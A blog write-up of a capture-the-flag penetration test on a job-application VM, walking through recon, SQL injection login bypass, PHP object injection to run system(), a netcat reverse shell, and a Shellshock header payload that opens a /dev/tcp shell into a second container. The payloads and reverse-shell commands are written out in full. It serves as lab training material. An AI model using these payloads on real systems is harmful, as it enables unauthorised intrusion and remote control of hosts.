A Simple Penetration Test

Editor's Note from July 2020: This post comes from part of a job application I submitted right around the New Year, for a position as a junior penetration tester for the Department of Defense. I'm re-posting it here because even though it is fairly basic and straightforward as far as penetration testing goes, it's still useful to demonstrate the mindset and approach I used.

Introduction and Setup

My name is Max Weiss, and I am a graduate student at the University of Washington, Bothell, studying for an M.S. in Cybersecurity Engineering. I have a varied work history, including several years of experience as a professional poker player, which I believe gives me a unique perspective in adversarial thinking and risk analysis.



One of the clubs at my school is a cybersecurity club called UWB Grayhats. In the Discord chat for this group, a user posted a link to a Twitter post which contained an OVA file download with little additional information. (Although, with the hashtags #CISA and #redteam along with the user's profile reading Chief CISA (DHS) Cyber Assessments / Nations's Red Team, I did think it likely that this was a job application.)

Initial Recon





Under the assumption that I was to treat this virtual machine as a remote host, I began my initial reconnaissance. In a typical engagement, this would generally first entail some time on Google gathering information in order to gain a more holistic view of the adversary. But in this instance, the scope of the engagement was likely to be a straight technical pentest. So I fired up nmap to see what was listening on TCP ports.

(Please note that timestamps in the images are not accurate, as I have recreated the attack to take appropriate screenshots.)

Only TCP ports 22 and 8100 were open, so I ran a new scan to do a more thorough examination of those open ports. Given the scope of the engagement, I wasn't worried about tripping any alarms, so I used the more aggressive scanning options. I also started a UDP scan in the background since UDP scans take significantly longer. (It finished some time later and did not yield any open ports.)
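For readers who want to see the idea behind that first scan in code, here is a minimal Python sketch of a TCP connect scan. It is only an illustration: nmap does far more (service fingerprinting, SYN scans, timing control), and the function name `scan_tcp_ports` and the half-second timeout are my own assumptions rather than anything taken from nmap.

```python
import socket


def scan_tcp_ports(host, ports, timeout=0.5):
    """Return the ports on `host` that accept a full TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex() returns 0 on success instead of raising an exception.
            if sock.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

Calling `scan_tcp_ports("192.168.1.69", [22, 80, 443, 8100])` against the lab VM would be the rough equivalent of the first pass described above. A connect scan is the noisiest option, since every probe completes the handshake, which is acceptable only because stealth was out of scope here.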

The nmap scan was very interesting. In particular, the OpenSSH banner listed the host as Ubuntu, but the Apache version banner showed it as Debian. Although Ubuntu is based on Debian, the default Apache software in the Ubuntu repositories lists Ubuntu in the Apache version, not Debian. This means that either one of these pieces of software was custom-installed, or more likely, some form of containerization/virtualization was taking place. Because SSH is more likely to be open on a host than a guest OS, and also because of Ubuntu's popularity, it seemed probable that SSH was open on the host and port 8100 was pointing to a container. (Later information confirmed this to be the case.)
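The banner comparison is simple enough to sketch in a few lines of Python. The banner strings in the usage note are made-up stand-ins, not copied from the actual scan output, and the helper names and the short distribution list are assumptions for illustration only.

```python
KNOWN_DISTROS = ("ubuntu", "debian", "centos", "fedora")


def distro_hints(banner):
    """Return the set of distribution names mentioned in a service banner."""
    lowered = banner.lower()
    return {name for name in KNOWN_DISTROS if name in lowered}


def banners_disagree(banners):
    """True if at least two banners name a distribution and they share none."""
    hint_sets = [hints for hints in map(distro_hints, banners) if hints]
    if len(hint_sets) < 2:
        return False
    return not set.intersection(*hint_sets)
```

With hypothetical banners such as `"OpenSSH 7.6p1 Ubuntu"` and `"Apache/2.4.25 (Debian)"`, `banners_disagree` returns `True`, which is the same hint that pointed me toward containerization.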

Googling the SSH version told me the machine was likely to be Ubuntu 18.04, and additionally, this SSH version has a username enumeration vulnerability that was patched in March 2019. Aside from potentially finding usernames on the host, this meant that the machine likely had not been updated for quite some time. If that was the case, and if indeed the machine was running containerization software, I thought there was a decent chance I could escape the container and pivot onto the host machine. (Several critical vulnerabilities in various containerization software have been discovered since March 2019.) While not immediately helpful, this information was worth noting. And if all else failed, I could do more information gathering and build a wordlist of potential usernames to try with the user enumeration vulnerability.

The SSH host keys were reasonably strong, and Ubuntu 18.04 doesn't have any (discovered) weaknesses in generating SSH host keys, so it was time to move on to the much more promising attack vector of the HTTP port, 8100. The nmap scan showed that it was running PHP as well as Apache. The Apache version has several critical CVEs, many of which have been discovered since March 2019. Additionally, this version of Apache was released in December 2016. That may simply mean that the container image hadn't been updated in a while or it may mean it was intentionally downgraded. Either way, there were some potential exploits which would have been very promising attack vectors had the website analysis failed to turn up anything. Lastly, the most recent PHP version as of December 2016 was 7.0.14 on the v7 branch and 5.6.29 on the v5 branch. Those may or may not be the versions running, but once again, it's just worth noting.

One more note of interest before examining the website via browser is that the httponly flag was not set on the site's cookie. Were this an actual remote server, the lack of SSL would make this site susceptible to a man-in-the-middle attack, and the missing httponly flag would let any injected JavaScript read the cookie. That's not really useful or in scope for this task, but it's just one more thing to take note of. In a real engagement, aside from the inherent usefulness of a MITM attack, these things may indicate sloppy security in other areas. I would, for example, think it much more likely that accounts on this machine might have weaker/reused passwords, access permissions not securely restricted, and insecure default settings possibly still intact.



The Website



The website didn't yield much useful information. It simply displayed a basic login form with no extra fluff. I ran OWASP Dirbuster on the site, checking for directories and files with common web extensions. While that was running, I took a look at the source of the pages and enumerated what was available in those. The top-level index page loaded the relative stylesheet URLs /css/font-awesome.min.css and /css/styles.css as well as the JavaScript files /js/jquery.min.js and /js/login.js. Although it was unlikely that there were exploitable files in those directories, they're still useful in learning about the structure of the website. I made a note of the file locations, and while Dirbuster was still running, I started googling for the “Template created by: boudra.me” text at the bottom of the page. It was likely that this was a standard free CSS template, but there was also a non-zero chance that boudra.me was a private entity, and in a real engagement, they might be a resource to contact for information about the target. But alas, after a few minutes of searching, it turned out the CSS theme was indeed just a standard free template.





As Dirbuster was wrapping up, I took a look at the only non-standard file, login.js. Given that the index page's login form didn't have an action or submit method associated with it, the login.js file was the natural place to view how the request was being handled. The code was fairly easy to read and indicated a simple POST request to login.php. It would then reload the page if the data returned by the request was the single character '1'. Capturing the request and response in Burp Suite Community Edition confirmed this, or at least it showed that no data was returned on a failed login:

Presumably, a server-side change would happen and the PHP cookie would allow access. This also meant that the PHP code in the index page must be checking for that authentication, since reloading the page cannot work as a login method unless the PHP code does some kind of server-side magic. Additionally, the response had an X-Powered-By header showing the server was running PHP version 7.2.2, which was first available in February 2018. (Again, not immediately useful but worth noting.)

Checking back on Dirbuster, I found that it was not yielding anything particularly interesting:

I let it finish running the scan, using the directory-list-2.3-medium wordlist that comes pre-packaged. As a last-ditch effort, I tried logging in again with random credentials and intercepting the request with Burp, but this time changing the response to the single byte of data '1'. I didn't expect anything to happen, since the JavaScript clearly indicated the change would have to happen server-side... but I've missed or misinterpreted my findings before, and I have learned always to try the simple stupid stuff, just in case.



Speaking of simple stupid stuff, I realized at this point that I hadn't yet tried SQL injection on the login page. Using the captured POST requests from Burp, I started sqlmap. I also began attempting some common injection techniques manually. After failing a few times with the password box, a simple injection string in the username field of admin' OR 1=1-- - worked.
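To show why that string works, here is a small self-contained Python sketch using an in-memory SQLite database. This is a stand-in, not the target's code: the real backend was PHP talking to MySQL and I never saw its query, so the table layout, the user `alice`, and both function names are assumptions. The mechanism is the same in either database, though: input spliced into the SQL text can rewrite the query.

```python
import sqlite3


def vulnerable_login(conn, username):
    """Look up a user by splicing the username straight into the SQL text."""
    # Unsafe on purpose: the input becomes part of the query itself.
    query = "SELECT username FROM users WHERE username = '" + username + "' LIMIT 1"
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username):
    """Same lookup with a bound parameter, so the input stays plain data."""
    query = "SELECT username FROM users WHERE username = ? LIMIT 1"
    return conn.execute(query, (username,)).fetchone() is not None


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'not-a-real-hash')")

payload = "admin' OR 1=1-- -"
print(vulnerable_login(conn, payload))  # True: OR 1=1 matches every row
print(safe_login(conn, payload))        # False: no user has that literal name
```

In the vulnerable version the quote closes the string early, `OR 1=1` makes the condition true for every row, and `-- -` comments out whatever the query had after the username. That is consistent with what I observed next, where the username itself turned out not to matter.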

I was logged in and forwarded to a path Dirbuster missed, /YINXEtKn/. I tried a handful of different usernames, logging in and out, and discovered that the username didn't matter. There was no user panel, and even a username consisting of random junk text was successfully logged in. Still, I let sqlmap continue running, because it has the added feature of dumping databases purely through injection, and I figured this might at the very least get me some usernames and passwords I could use later. (As mentioned previously, in a real engagement, using aggressive tactics like this may not be wise. Using sqlmap, and especially dumping the database, is highly suspicious activity that will trip any halfway competent intrusion detection system. But for a CTF exercise like this, that's not an issue.)





sqlmap didn't disappoint. It mapped out the entire MySQL database. There was only one database in use, applicant_portal, and it contained only one table, users, which itself contained only one entry:

Username: bob_the_admin

Password Hash: $2y$10$c2ZzLWpvYi1mYWlyLTIwMOnygxI45/.MsdsALKB.tQ/ERon8dLcYy

The password hash indicates a relatively secure hashing algorithm (Bcrypt), but I still saved the hash in case I hit dead ends later. And the username is very useful since it indicates high privileges (admin) as well as the name Bob, which might be useful in further information gathering or SSH username enumeration. As can be seen from the images below, sqlmap also got a lot of information about the system. In particular, the hostname of 4dc163c4f905 supported my hypothesis that this was a container, since Docker's default hostname is the short container ID, which is 12 hex characters (6 bytes).
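Both observations can be checked mechanically. The sketch below splits a bcrypt hash into its fields and tests whether a hostname has the shape of a short container ID. The function names and regular expressions are my own, and a matching hostname is only a hint that a host is a container, not proof.

```python
import re

# $<variant>$<cost>$<22-char salt><31-char digest>, all in bcrypt's base64 alphabet
BCRYPT_RE = re.compile(r"\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})")
SHORT_ID_RE = re.compile(r"[0-9a-f]{12}")


def parse_bcrypt(hash_text):
    """Split a bcrypt hash into (variant, cost, salt, digest), or return None."""
    match = BCRYPT_RE.fullmatch(hash_text)
    if match is None:
        return None
    variant, cost, salt, digest = match.groups()
    return variant, int(cost), salt, digest


def looks_like_container_hostname(hostname):
    """True if the hostname is 12 lowercase hex characters, like a short container ID."""
    return SHORT_ID_RE.fullmatch(hostname) is not None


variant, cost, salt, digest = parse_bcrypt(
    "$2y$10$c2ZzLWpvYi1mYWlyLTIwMOnygxI45/.MsdsALKB.tQ/ERon8dLcYy"
)
print(variant, cost)  # 2y 10
print(looks_like_container_hostname("4dc163c4f905"))  # True
```

The cost field is a base-2 exponent, so a cost of 10 means 2^10 rounds of the key setup per guess. That is why cracking this hash was a last resort rather than a first step.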

I SQL injected my way into bob_the_admin's account to see if he had a different page than I had seen with other users. But Bob's page was exactly like everybody else's; there was no additional access gained by using his account. Too bad.

Logged In



Looking over this new webpage, there appeared to be some rather complicated analytics happening:

However, upon closer inspection of the JavaScript sources, it turned out to be just a smokescreen. The displayed charts were neither interactive nor updated by the JavaScript, and the account settings link did nothing. The only functioning parts of the webpage, according to the source code and associated JavaScript, were the Add Applicant and Applicant Queue sections. The associated JavaScript file located at /YINXEtKn/assets/js/applicant-api.js showed these sections to be updated via a POST request to /YINXEtKn/lib/ApplicantQueue.php. Seeing these paths made me realize that I hadn't run Dirbuster on this new location now that I was logged in, so I set it running again to search for anything it could find under the /YINXEtKn/ directory, using the same wordlist as before.







Next, I opened Burp again and captured the POST request for this Applicant Queue entry. Interestingly, my own request appeared to contain an encrypted blob of data in the cookie called Applicants, and the server's response contained a new data blob as well. After fiddling with this, it became clear that the data blob was in fact a list of the applicants in the Applicant Queue on the page. By replaying previous cookie values, I could reset the applicant queue to previous versions, and the server would send predictable responses. Whatever encoding method was being used, it was static and susceptible to replay attacks.

The response also contained a JSON-encoded list of applicants in addition to the new cookie. This meant that the server was decoding the cookie I sent, parsing it somehow, and echoing back the decoded applicant queue. Although it is possible to do this safely, given that this was the only interesting thing happening on the webpage, it seemed extremely likely to me that this was the intended attack vector. Sending arbitrary data of my choosing which the server will process and echo back... that's a recipe for remote code execution. Now I just had to figure out how the Applicants cookie encoding worked. Learning that would allow me to view the decoded applicant queue data, which should in turn give me a good idea of how to craft a malicious payload.

Backend Source Code

After banging my head against the wall for some time trying to determine the encoding scheme for the Applicants cookie, I had gotten nowhere. Dirbuster hadn't found any new results either. I decided to take a break and pursue other possible areas of interest.

As I was poking around the site's javascript for any more hints, I noticed that the base path of /YINXEtKn/assets/js/ displayed the directory listing of the folder, which was something the main non-logged-in site did not permit. Every other sub-path inside /YINXEtKn/ also showed the bare directory.



Looking around the available base folders didn't yield much, but after more dead ends, one of the things I finally decided to try with this change in access was re-running Dirbuster with a wordlist of target-rich file and folder names like "config.php.bak" and ".ssh/". (I have since found an even longer file/folder list after more googling. This challenge also convinced me to add these filename wordlists to my default Dirbusting wordlist, so I don't waste time missing something like this again.)
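The idea of a "target-rich" wordlist is easy to sketch. The names and suffixes below are a tiny hypothetical sample rather than the list I actually used, and `candidate_urls` is an illustrative helper, not part of Dirbuster.

```python
# Hypothetical sample of sensitive names; a real list would be far longer.
SENSITIVE_NAMES = [".git/", ".ssh/", ".env", "config.php", "backup.zip"]
BACKUP_SUFFIXES = [".bak", ".old", "~"]


def candidate_urls(base_url, names=SENSITIVE_NAMES, suffixes=BACKUP_SUFFIXES):
    """Yield each sensitive name under base_url, plus backup variants of the files."""
    root = base_url.rstrip("/") + "/"
    for name in names:
        yield root + name
        if not name.endswith("/"):  # backup suffixes only make sense for files
            for suffix in suffixes:
                yield root + name + suffix


for url in candidate_urls("http://192.168.1.69:8100/YINXEtKn/"):
    print(url)
```

Each generated URL would then be requested with the logged-in session cookie, and anything that does not come back as a 404 deserves a closer look. The point is that a short list of high-value names can find things that a generic dictionary never reaches.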

This search turned out to be the missing piece, and Dirbuster showed me the keys to the kingdom:



After some googling for how to recursively download a directory, I ended up using the following wget command to grab the .git directory and its contents, ignoring any webserver-generated index files:

$ wget -r -np --header="Cookie: PHPSESSID=6c08254f898c0d0b92e364009b32d15a;" \
    -R "index.php*" -R "index.htm*" -R "index.html*" \
    "http://192.168.1.69:8100/YINXEtKn/.git/"

Although the downloaded content was a bare git repository, I was able to run git clone on the downloaded folder to get the original file and folder structure:



I immediately ran the git log command to see if there were previous commits in the history. There was only one initial commit, but it had a promising commit message:





Looking at the downloaded files, it appeared I was correct about ApplicantQueue.php being the place to exploit. And the reason I couldn't decode the cookie was that it was encrypted with AES, so what I was viewing truly was encrypted random junk. (As a side note, it was encrypting everything using the same hard-coded IV, which is a weakness in its own right: identical plaintexts always produce identical ciphertexts, and depending on the cipher mode this can leak information about the plaintext without knowing the password. In this case however, the encryption password was also hard-coded inside the file.)



I created my own Docker container with PHP 7.2.2 in it, and copied the ApplicantQueue.php file into it. I modified it to disable the cookie checks and the data processing and to echo back just the decrypted version of the Applicants cookie strings I had saved, so I could see what they were. They ended up being ASCII-serialized versions of the ApplicantQueue class inside the PHP file, which confirmed my suspicion that there was no data being saved server-side and that the website's applicant queue was simply being processed and sent back.

The serialization and deserialization really jumped out at me, especially because the serialized data was the text being sent back and forth in the cookie. Having used Python's pickle library and Java's dynamic class loading for some of my school courses, I was well aware of the potential perils of run-time object loading. So I spent some time learning about PHP's version of using malicious serialized objects, which is referred to as PHP Object Injection. I learned a lot about how PHP Object Injection works and found several exploitable libraries and GitHub code examples. Unfortunately, there were none which seemed applicable to this situation. Because ApplicantQueue.php used no libraries or external code, I needed something in the default PHP library, or else in the ApplicantQueue.php code itself. More googling told me that PHP default functions weren't likely to be useful, which I suppose is a good thing... So I went back to the ApplicantQueue.php source code, and I took a closer look at the control flow of the code and the contents of the ApplicantQueue class.

Crafting the Exploit

The first thing that happens in ApplicantQueue.php is the variable $al gets assigned. During this process, a ternary operator calls the deserialize_queue() function, which in turn calls the unserialize() function. If the ApplicantQueue class had any of PHP's magic methods, such as __wakeup() or __destruct(), those would be called automatically when the object was unserialized or destroyed. Unfortunately, the ApplicantQueue class lacked any such functionality. The only time the instantiated $al object ran code was when a user was added or removed, and when the list of applicants was echoed out. Therefore, I examined how each of those functions was implemented.

After close inspection, the getApplicants() function was the clear winner. It is run when the line of code echo $al->getApplicants(); is called. When run, it calls the function array_filter(), which takes as one of its arguments a callback function, which is a function that gets executed using the array elements as arguments. This callback function was set by default to reference the previously defined isApplicantEmpty() function; however, the serialized applicant object text I had decrypted earlier also had that same function name inside it. This was important: it indicated that I could alter that name manually in the serialized cookie data, causing the remote server to deserialize it and execute a function of my choosing. (In theory...)



With my direction clear, I edited my testing version of ApplicantQueue.php and modified its class definition to set the $filter variable to "system" to call the PHP built-in system() function. I couldn't change the getApplicants() function, because the server-side deserialization wouldn't reflect those changes. However, I could control the $filter value, and that's just as good since it is used directly in the called function.

Next I instantiated a new object and added an array element 'id' which is the system command that I wanted the system() function to call. Then I just echoed out the serialized version of this object to get the cookie value I could feed to the server. The result was this beautiful text:

UnpWVjdFdUo2dWNEdENpNnF3cHdaNUYyYTB2WWsrU3UrSGNwVWtFMk9henl1RG1J
b1h6N3Voc2psOGFhRzJKa3A3VDdHQnBrdkh5SzlHd1ArWmJMdWRTY2JEWVFJaElJ
b0hnbmcrVVVsWkR5VkdnZ2s1djUzaXN1Z2k1bXRCaWxMOWxQSHhmVkFvQlZLT3JS
OTVUUlZRPT0=
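Before encryption, the payload is just a short piece of text in PHP's serialize() format. The Python sketch below rebuilds that format by hand to show its shape. It rests on several assumptions: the property name `applicants` is a guess at the real one, both properties are treated as public (private and protected ones carry extra prefix bytes), and the AES and base64 steps that produced the cookie above are left out.

```python
def php_serialize(value):
    """Serialize str, int, list and dict values in PHP's serialize() text format."""
    if isinstance(value, str):
        # PHP's length prefix counts bytes, not characters.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, list):
        value = dict(enumerate(value))  # PHP lists are arrays with integer keys
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


def php_serialize_object(class_name, properties):
    """Serialize an object whose properties are all public."""
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in properties.items())
    return 'O:%d:"%s":%d:{%s}' % (len(class_name), class_name, len(properties), body)


payload = php_serialize_object(
    "ApplicantQueue",
    {"filter": "system", "applicants": ["id"]},  # "applicants" is a hypothetical name
)
print(payload)
# O:14:"ApplicantQueue":2:{s:6:"filter";s:6:"system";s:10:"applicants";a:1:{i:0;s:2:"id";}}
```

Every string is length-prefixed, so hand-editing a serialized object means keeping those counts in sync. That is one reason I let PHP generate the payload from a modified copy of the class instead of editing the text directly.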



After confirming the code execution worked, I repeated the process with the command nc -h 2>&1 to see if the machine had a version of netcat that can execute a program on connect (the -e option). (I have previously run into situations where a command produced errors but nothing on stdout, so as a general rule, I always redirect stderr to stdout in situations like this to ensure the program output will be displayed.)
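The effect of 2>&1 is easy to reproduce locally. In this Python sketch the child process is a stand-in that writes only to stderr, and the variable names are mine. The first run captures stdout alone, much like a web page that only echoes a command's stdout, and the second merges the two streams.

```python
import subprocess
import sys

# Stand-in child process that writes only to stderr.
child = [sys.executable, "-c", "import sys; sys.stderr.write('usage text\\n')"]

# Capture stdout only and discard stderr: the output is lost.
stdout_only = subprocess.run(child, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)

# Equivalent of appending 2>&1: stderr is sent down the stdout pipe.
merged = subprocess.run(child, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

print(repr(stdout_only.stdout))  # empty bytes
print(repr(merged.stdout))       # the usage text shows up here
```

When the only feedback channel is whatever the server echoes back, losing stderr means working blind, so the redirect costs nothing and can save a lot of guessing.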



Excellent! Now it was time to get a reverse shell. After double checking the location of bash with which bash 2>&1, I used my local netcat software to start listening on port 31337 and set the command to nc -e /bin/bash 192.168.1.243 31337 to connect to my IP address on port 31337...

... And I'm in!

In the Box



Browsing around the html folders, I immediately came across "flag.txt" sitting in /var/www/, which told me the challenge wasn't yet over:

I didn't know if I needed to get root and break out of the Docker container, or what specifically the next steps were, but it was time to do some more recon from inside the container.



I navigated to the /tmp folder, and downloaded a standard enumeration shell script called LinEnum.sh. This showed my network address as 172.18.0.4/16, which likely meant there were several other containers, and the host IP could probably be reached at 172.18.0.1. I didn't have ifconfig, nmap or any other utilities, so I ran ping on 172.18.0.1-172.18.0.3 and got responses, but 172.18.0.5 and onward showed nothing.
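The subnet reasoning can be reproduced with Python's standard ipaddress module. This is a sketch of the arithmetic only: the function name and the limit of eight addresses are assumptions, and the first usable address being the gateway is a common Docker default rather than a guarantee.

```python
import ipaddress


def sweep_candidates(interface_cidr, limit=8):
    """Return the network, its first host address, and the first few hosts to probe."""
    interface = ipaddress.ip_interface(interface_cidr)
    network = interface.network
    hosts = iter(network.hosts())    # usable addresses, lowest first
    first_host = next(hosts)         # on Docker bridge networks this is usually the gateway
    candidates = [first_host]
    for host in hosts:
        if len(candidates) >= limit:
            break
        if host != interface.ip:     # no need to probe our own address
            candidates.append(host)
    return network, first_host, candidates


network, gateway, candidates = sweep_candidates("172.18.0.4/16")
print(network)   # 172.18.0.0/16
print(gateway)   # 172.18.0.1
print([str(ip) for ip in candidates])
```

A /16 holds more than 65,000 addresses, so probing only the lowest few is a shortcut that relies on addresses being handed out sequentially. That matched what I saw here, with responses stopping after 172.18.0.4.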

At this point, I thought it probable that there was the host, there was the container I was in, and there were two remaining containers. From my SQL injection earlier, I knew there was a MySQL server somewhere... and it wasn't on this container, so that accounted for one of the two remaining containers. That was good to know, so if I didn't find more information, I could attempt to use SQL injection to get access to that MySQL container and see what I could do over there. But for the time being, my goal was to find more useful information, and see if I could get root on this container. There are several[1] critical[2] CVEs[3] that have come out for Docker this past year, and I thought there was a decent chance I could break out into the host if I could get root in my current container.

The LinEnum.sh results showed that the container had Python as well as GCC, so even though it lacked many networking and other utilities, in the worst case I could use Python to do network mapping, and/or use gcc to compile any programs I couldn't find static binaries for.



After a few more hours poking around and coming up short, I finally noticed that I had missed a cron job called stat-check shown in LinEnum.sh. The name sounded innocuous but it wasn't familiar, and a non-default cron job was especially peculiar here because cron wasn't one of the running processes and thus the job wouldn't get executed.



I took a look at this stat-check script and it was running a curl command for the website http://c2-web.local/. I used ping on the domain (since nslookup and dig and all other tools were unavailable), and it showed a resolved IP of 172.18.0.2. I was now very sure that this CTF wanted me to pivot into this other container. c2-web.local also accounted for the last of my pinged IP addresses, assuming MySQL wasn't running on it, so I figured I was nearing the end of the road.

The cron job was set to run as root and save its output to a file. If I could get cron running, and if I could break into the other container and modify its contents, I thought I might be able to use it to write a file as the root user on my present container. I wasn't confident of that, since I didn't know how to turn cron on, and even with write access, the output file would not be executable, so the plan was certainly not complete... but it was a start at least.

I ran the curl command to see what it showed, and the result was a simple webpage that loaded an iframe from the source /cgi-bin/stats. It also contained the text “This challenge might be a bit of a shock to you.” The cgi-bin path and the use of the word “shock” immediately made me suspect the path might be susceptible to the Shellshock exploit. Running curl on http://c2-web.local/cgi-bin/stats showed a page whose contents looked like the output of system commands, which strengthened my suspicion that this was a Shellshock exploit.



I got a second shell in the Docker container (by running a reverse shell command with an ampersand to background it) and started a netcat instance listening on port 31337 inside the current container. I did it inside the container in case the c2-web.local container was firewalled from connecting to the outside. Because of the curl run, I knew for sure it could talk to the container I was in, so I wanted to be safe and save myself from a potential hours-long headache diagnosing the wrong problem in the event my exploit didn't connect.

I ran a curl command with a standard Shellshock injection in the user-agent header:

curl -A "() { :; }; /bin/bash -i > /dev/tcp/172.18.0.4/31337 0<&1 2>&1" http://c2-web.local/cgi-bin/stats &
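The header value in that command has two parts, and a short Python sketch makes the split explicit. The helper names are mine, and the code only builds the string; it sends nothing.

```python
def shellshock_header(command):
    """Build a header value that an unpatched bash would execute when importing it."""
    # "() { :; };" looks like an exported function definition. Vulnerable bash
    # versions keep parsing past the closing brace and run whatever follows.
    return "() { :; }; " + command


def reverse_shell_command(listener_ip, listener_port):
    """The bash one-liner from the curl command above, with the address filled in."""
    return "/bin/bash -i > /dev/tcp/%s/%d 0<&1 2>&1" % (listener_ip, listener_port)


user_agent = shellshock_header(reverse_shell_command("172.18.0.4", 31337))
print(user_agent)
# () { :; }; /bin/bash -i > /dev/tcp/172.18.0.4/31337 0<&1 2>&1
```

The reason a header works at all is that CGI hands request headers to the script as environment variables (the User-Agent becomes HTTP_USER_AGENT), and Shellshock (CVE-2014-6271) is triggered when bash starts up and imports such a variable. Any header would likely do; the user agent is simply the easiest one to set with curl.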



And I was in the c2-web.local container!



Given that the flag file on the first container was named “flag.txt,” I immediately just searched for that with find / -name "flag.txt" 2>/dev/null.

Aftermath

The CTF challenge appeared to be over, but I still wanted to see if I could break into the host and just straight-up root the main virtual machine. However, after more than two days of exhaustive searching, I could not find a method to escalate from the www-data user account to root in either of the containers, and I decided it was time to throw in the towel. During my initial attempts to get the OVA file running in VirtualBox, at one point I converted the internal VMDK disk image to a raw disk format in order to attempt to use that as VirtualBox's hard disk. I now considered mounting that raw disk image locally, changing the root user's password, reconverting it to VMDK format, replacing the VM hard disk with my modified version, logging into the machine as root, and using docker exec to test the previously mentioned Docker escape CVEs. At least that way I would know if it was worthwhile to try to figure out how to root the containers. But with Christmas coming up, I just didn't have time for all that fun.